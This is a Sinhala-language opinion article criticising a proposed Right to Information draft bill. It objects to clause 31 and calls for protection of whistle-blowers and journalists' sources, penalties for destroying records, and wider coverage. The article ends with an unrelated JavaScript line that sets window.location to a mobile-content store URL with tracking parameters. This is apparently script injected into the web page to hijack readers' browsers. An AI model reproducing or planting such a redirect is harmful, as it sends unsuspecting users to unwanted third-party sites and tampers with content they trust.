තොරතුරු දැනගැනීමේ අයිතිය ගැන අවදියෙන් සිටිමු

විජයානන්ද ජයවීර

තොරතුරු දැනගැනීමේ අයිතිය පිළිබඳ යෝජිත පනත් කෙටුම්පත යැයි සැලකෙන ලියවිල්ලක් මේ දිනවල ඇතැම් සංවිධාන අතර සංසරණය වෙයි. එහි පිටපතක් මටද ලැබුණු අතර එම කෙටුම්පතේ සඳහන් 31 වැනි වගන්තිය මගේ ඉමහත් විමතියට බඳුන් විය. ඉංග‍්‍රීසි බසින් ඇති කෙටුම්පතේ ඇති එකී 31වැනි වගන්තියේ දළ සිංහල පරිවර්තනය මෙබඳුය. ‘31ග මේ පනතේ ප‍්‍රතිඵලයක් ලෙස කරන ලද ඉල්ලීමකට අනුව ඕනෑම තොරතුරුක් ලබාදීම එම තොරතුර ලබාගත් තැනැත්තාට එකී තොරතුර ප‍්‍රකාශනයට පත්කිරීමට මහජන අධිකාරයක් හෝ කොමිසම ( පනත යටතේ පිහිටුවනු ලබන තොරතුරු කොමිසම* විසින් දෙනු ලබන අවසරයක් ලෙස නොසැලකිය යුතුය.’

ඉහත කී වගන්තිය තොරතුරු දැනගැනීමේ අයිතිය භාවිතකිරීමට ඉමහත් බාධාවක් විය හැකිය. මන්ද තොරතුරු දැනගැනීම පමණක් නොව එසේ දැනගත් තොරතුරු යළි භාවිතකිරීමට හා තමන් කැමැති ඕනෑම මාධ්‍යකින් ප‍්‍රකාශයට පත්කිරීමට හා තොරතුරු ලබා ගන්නා අයට අයිතිය තිබිය යුතුය. මෙය සුවිශේෂ වශයෙන්ම ජනමාධ්‍යවේදීන්ට අදාළවේ. පනත යටතේ ලබා ගන්නා තොරතුරු තම වාර්තාකරණය සඳහා යොදා ගැනීමටත් තමන්ගේ මාධ්‍ය ප‍්‍රකාශන හරහා පළකිරීමත් ජනමාධ්‍ය සේවයේ නියුතු අයගේ වෘත්තීය වගකීමක් වන බැවිනි. මේ පනත යටතේ ලබාගන්නා කිසියම් තොරතුරක් ප‍්‍රකාශයට පත්කිරීමෙන් තොරතුරු ලබන්නා වැළැක්වීමට කිසිවෙකුට අවශ්‍ය නම් ඒ සඳහා උසාවි නියෝගයක් ලබාගැනීමට වුවද මෙකී 31 වැනි වගන්තිය යොදා ගත හැකිවීමට ඉඩ තිබේ. එම නිසා මේ වගන්තිය කෙටුම්පතෙන් ඉවත් කළ යුතුය.

අනෙක් වැදගත් ඌනතාව තොරතුරු ඉල්ලා සිටින පුද්ගලයෙකුගේ සුවිශේෂ ඉල්ලීමකින් තොරව මහජන ආයතනවල දූෂණ වංචා ආදිය ස්වේච්ඡාවෙන්ම හෙළිදරව් කිරීමට ඉදිරිපත්වන රාජ්‍ය සේවකයන් (Whistle-blowers) ආරක්ෂා කිරීමේ විධිවිධාන මේ කෙටුම්පත තුළ කිසිසේත්ම අඩංගු නොවීමයි. ගෝලීය පාරදෘශ්‍ය ව්‍යාපාරය (Global Transparency Initiative) විසින් සකස් කරන ලද ලෝක බැංකුව අනුදත් තොරතුරු අයිතිය පිළිබඳ ආදර්ශ නීති කෙටුම්පතේ යොදා ඇති පහත සඳහන් විධිවිධානවලට සමාන විධිවිධාන මේ සඳහා යොදා ගත හැකිය.

xකිසියම් වැරදි ක‍්‍රියාවක් සම්බන්ධයෙන් හෝ මහජන සෞඛ්‍යට, ආරක්ෂාවට හෝ පරිසරයට බරපතළ තර්ජනයක් විය හැකි තොරතුරක් අනාවරණය කරන පුද්ගලයෙකු සිය රැකියාවේ හා ආයතන සංග‍්‍රයේ සඳහන් කොන්දේසි නොතකා එම අනාවරණය කිරීම සද්භාවයෙන් හා එළිදරව් කරන තොරතුර ප‍්‍රමාණවත් තරමින් සත්‍යයක් බව විශ්වාස කරමින් එම වැරදි ක‍්‍රියාව හෝ මහජන සෞඛ්‍යය, ආරක්ෂාව, පරිසරයට ඇති තර්ජන පිළිබඳ සාක්ෂි සද්භාවයෙන් යුතුව එළිදරව් කිරීමේ හේතුවෙන් එම පුද්ගලයා වෙත කිසිදු නීතිමය, ආයතනික හෝ පරිපාලනමය දණ්ඩනයක් නියම කළ නොහැක්කේය.

ඉහත සඳහන් උපවගන්තියේ වැරදි ක‍්‍රියාවන් යනුවෙන් සඳහන් ගණයට සාපරාධී වරදක් කිරීම, නීත්‍යනුකූලව කටයුතු කිරීමට අසමත්වීම, යුක්තියේ අවගමනයක් (a miscarriage of justice), දූෂණය, වංචාව හා මහජන ආයතන සම්බන්ධ නොමනා පාලනය (maladministration) අයත් වේ.

දූෂණය, චංචාව, අකාර්යක්ෂමතාව පිටුදැක යහපාලනයක් ඇතිකිරීමට රාජ්‍ය සේවකයන්ගේ දැනුවත් මැදිහත්වීම ලබා ගැනීමට නම් එවැනි කටයුතු එළිදරව් කරන රාජ්‍ය සේවකයන් ආරක්ෂා කළ යුතුය. ඒ සඳහා නීතිය මගින්ම ආරක්ෂාව සැලසීම තොරතුරු දැනගැනීමේ අයිතිය පිළිබඳ පනත යටතේ කළයුතු දෙයකි.
මහජන ආයතන සතුව ඇති තොරතුරු හිතාමතා විනාශ කිරීමෙන් හෝ අස්ථානගත කිරීමෙන් වළක්වන විධිවිධානද කෙටුම්පතේ අඩංගු විය යුතුව තිබුණි. මන්ද ඇතැම් තොරතුරු හෙළිදරව්වීම වැළැක්වීම පිණිස ෆයිල් අතුරුදහන් කිරීම වැනි කටයුතු සිදුවන බව අප දන්නා බැවිනි. තොරතුරු චසං කිරීම අපරාධයක් ලෙෂ සලකා ඒ සම්බන්ධයෙන් ක‍්‍රියාකරන ආකාරයද පනතේ සඳහන් විය යුතුය.

පුවත්කලාවේ නියුතු ජනමාධ්‍යවේදීන් සතු අයිතියක් වන තම තොරතුරු ප‍්‍රභවයන් හෙළි නොකිරීමේ අයිතිය හා සංලේඛ්‍ය නිදහසට සම්බන්ධ කටයුතු මේ පනත් කෙටුම්පතෙන් යළි තහවුරු කළ යුතු වේ. මන්ද රාජ්‍ය මාධ්‍ය ආයතනයැයි සැලකෙන ආයතනවල සේවයේ නියුතු පුවත්කලාවේදීන්ටද මේ පනත අදාළ වන බැවිනි. රාජ්‍ය ආයතන හා රජයේ දායකත්වය ලැබෙන ආයතන හැරෙන විට මේ පනත මහජන සම්පත් යොදාගන්නා පෞද්ගලික ආයතනවලටද අදාල විය යුතුව තිබේ. උදාහරණයක් වශයෙන් මහජන සම්පතක් වන ගුවන් තරංග යොදා තම සේවාවන් පවත්වාගෙන යන පෞද්ගලික මාධ්‍ය ආයතනවල සංලේඛ්‍ය නිදහස හා කෙලින්ම සම්බන්ධ නොවන තොරතුරු ලබාගැනීමට මේ පනත යටතේ ඉඩ ප‍්‍රස්ථා සැලැසිය යුතුව තිබුණි. එමගින් පෞද්ගලික විද්‍යුත් මාධ්‍යවල කටයුතුද වඩා පාරදෘශ්‍යභාවයකින් ඉටුකිරීම දිරි ගැන්විය හැකිය.

ඉහත කරුණු අනුව බලන විට කඩිමුඩියේ ගෙනඑන අසම්පූර්ණ තොරතුරු සැපයීමේ නීතියකට වඩා හුදෙක් තොරතුරු ලබාදීම පමණක් නොව යහපාලනය හා පාරදෘශ්‍යභාවය සැබෑ අරමුණ වෙන ආකාරයට යෝජිත කෙටුම්පත නැවත සලකා බැලීම අත්‍යවශ්‍යය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;